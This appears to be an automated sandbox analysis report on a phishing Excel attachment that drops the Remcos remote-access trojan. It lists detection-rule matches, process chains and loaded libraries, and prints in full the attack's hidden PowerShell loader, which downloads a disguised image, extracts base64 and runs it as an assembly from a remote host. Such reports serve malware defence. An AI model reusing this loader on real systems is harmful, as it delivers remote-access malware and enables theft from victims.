                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3084, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFA95D3F.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
                Source: bhv2AF7.tmp.15.dr Binary or memory string: org.slneighbors
                Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winXLSX@19/30@11/5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 18_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$RFQ No. 109078906v.xla.xlsx
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-R2I0JW
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR7FE8.tmp
                Source: RFQ No. 109078906v.xla.xlsx OLE indicator, Workbook stream: true
                Source: 9EC30000.0.dr OLE indicator, Workbook stream: true
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................T.r.u.e.(.P........................................................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ....................................u.e.(.P........................................................s............................................
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe System information queried: HandleInformation
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.528838090.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: RFQ No. 109078906v.xla.xlsx Virustotal: Detection: 21%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
                Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs"
                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qgopainsfhtlahdsndosiegdstrivgqcq"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? 
? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qgopainsfhtlahdsndosiegdstrivgqcq"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
